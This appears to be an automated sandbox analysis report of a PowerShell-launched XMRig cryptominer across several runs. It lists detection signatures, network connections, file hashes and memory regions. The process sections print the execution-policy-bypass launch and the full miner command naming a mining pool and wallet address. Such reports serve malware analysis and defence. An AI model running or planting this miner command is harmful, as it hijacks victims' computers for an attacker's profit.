| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2192 wrote to memory of 4160 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2192 wrote to memory of 4160 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/2192-4-0x00007FFE78563000-0x00007FFE78564000-memory.dmp
memory/2192-5-0x0000015D516E0000-0x0000015D51702000-memory.dmp
memory/2192-6-0x00007FFE78560000-0x00007FFE78F4C000-memory.dmp
memory/2192-10-0x00007FFE78560000-0x00007FFE78F4C000-memory.dmp
memory/2192-9-0x0000015D51890000-0x0000015D51906000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b0atsjvt.3fs.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2192-25-0x00007FFE78560000-0x00007FFE78F4C000-memory.dmp
memory/2192-48-0x0000015D51A10000-0x0000015D51A22000-memory.dmp
memory/2192-61-0x0000015D51870000-0x0000015D5187A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4160-90-0x0000023987960000-0x0000023987980000-memory.dmp
memory/4160-91-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-92-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/2192-93-0x00007FFE78563000-0x00007FFE78564000-memory.dmp
memory/2192-94-0x00007FFE78560000-0x00007FFE78F4C000-memory.dmp
memory/2192-95-0x00007FFE78560000-0x00007FFE78F4C000-memory.dmp
memory/4160-96-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-97-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-98-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-99-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-100-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-101-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-102-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-103-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-104-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-105-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-106-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-107-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-108-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-109-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-110-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-111-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-112-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-113-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-114-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-115-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-116-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-117-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-118-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-119-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-120-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-121-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-122-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-123-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-124-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-125-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-126-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-127-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-128-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-129-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-130-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-131-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-132-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-133-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-134-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-135-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-136-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-137-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-138-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-139-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-140-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-141-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-142-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-143-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-144-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-145-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-146-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-147-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-148-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-149-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-150-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-151-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-152-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-153-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-154-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-155-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
memory/4160-156-0x00007FF68C210000-0x00007FF68CE43000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1789s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2888 wrote to memory of 3504 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2888 wrote to memory of 3504 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.32.126.40.in-addr.arpa | udp |
| GB | 184.28.176.33:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 33.176.28.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.142.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.197.79.40.in-addr.arpa | udp |
Files
memory/2888-0-0x00007FFB832B3000-0x00007FFB832B5000-memory.dmp
memory/2888-6-0x000002216F580000-0x000002216F5A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mmf2d2rg.grv.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2888-11-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp
memory/2888-12-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp
memory/2888-14-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp
memory/2888-15-0x000002216F830000-0x000002216F842000-memory.dmp
memory/2888-16-0x000002216F550000-0x000002216F55A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3504-47-0x00000277693D0000-0x00000277693F0000-memory.dmp
memory/3504-48-0x0000027769520000-0x0000027769540000-memory.dmp
memory/3504-49-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-50-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/2888-51-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp
memory/3504-54-0x0000027769560000-0x0000027769580000-memory.dmp
memory/3504-53-0x0000027769540000-0x0000027769560000-memory.dmp
memory/2888-52-0x00007FFB832B3000-0x00007FFB832B5000-memory.dmp
memory/2888-55-0x00007FFB832B0000-0x00007FFB83D71000-memory.dmp
memory/3504-56-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-57-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-58-0x0000027769540000-0x0000027769560000-memory.dmp
memory/3504-59-0x0000027769560000-0x0000027769580000-memory.dmp
memory/3504-60-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-61-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-62-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-63-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-64-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-65-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-66-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-67-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-68-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-69-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-70-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-71-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-72-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-73-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-74-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-75-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-76-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-77-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-78-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-79-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-80-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-81-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-82-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-83-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-84-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-85-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-86-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-87-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-88-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-89-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-90-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-91-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-92-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-93-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-94-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-95-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-96-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-97-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-98-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-99-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-100-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-101-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-102-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-103-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-104-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-105-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-106-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-107-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-108-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-109-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-110-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-111-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-112-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-113-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-114-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-115-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-116-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-117-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
memory/3504-118-0x00007FF6F7E90000-0x00007FF6F8AC3000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 09:36
Platform
win10-20240404-en
Max time kernel
1798s
Max time network
1780s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4384 wrote to memory of 4128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4384 wrote to memory of 4128 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 1.0.a.d.6.8.4.c.2.6.6.6.8.4.0.e.1.0.a.d.6.8.4.c.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.110.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
